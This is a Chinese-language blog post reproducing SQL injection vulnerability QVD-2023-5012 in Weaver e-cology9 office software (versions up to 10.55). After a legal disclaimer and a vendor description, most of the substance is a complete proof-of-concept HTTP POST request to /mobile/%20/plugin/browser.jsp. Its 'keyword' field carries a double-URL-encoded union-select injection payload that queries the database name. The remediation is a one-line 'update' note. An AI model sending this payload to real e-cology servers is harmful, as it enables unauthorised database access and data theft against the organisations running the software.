声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本博客无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

泛微软件是业界领先的协同管理系统和解决方案供应商,凭借成熟的技术核心及雄厚的研发力量,基于先进的协同管理理念,自主研发了协同管理产品系列,包括泛微协同管理平台(e-cology)、泛微协同办公系统高级版(e-nature)、泛微协同办公系统标准版(e-office)和泛微协同政务系统(e-nation)四大产品系列,涵盖OA(协同办公)、EIP(企业信息门户)、KM(知识管理)、HRM(人力资源管理)、CRM(客户关系管理)、WM(工作流程管理)、PM(项目管理)、电子政务、内外网一体化管理等方面,并通过大量的客户积累和丰富的实践经验,在集团管理、高新技术、生产制造、咨询顾问、医药通信、房地产、酒店餐饮、金融业等领域形成了一整套成熟的行业解决方案。

官网:

https://www.weaver.com.cn/

漏洞编号:

QVD-2023-5012

影响范围:

泛微e-cology9 <= 10.55

0X02 漏洞复现

640_副本.jpg

POC:

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: 192.168.17.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 29 Oct 2019 02:49:52 GMT
If-None-Match: "/EskrA3/OXo"
Content-Type: application/x-www-form-urlencoded
Content-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2536%2534%2525%2536%2532%2525%2535%2566%2525%2536%2565%2525%2536%2531%2525%2536%2564%2525%2536%2535%2525%2532%2538%2525%2532%2539%2525%2532%2539%2525%2532%2562%2525%2532%2537
微信图片_20230814214949_副本.jpg

0X03 修复建议

更新至最新版!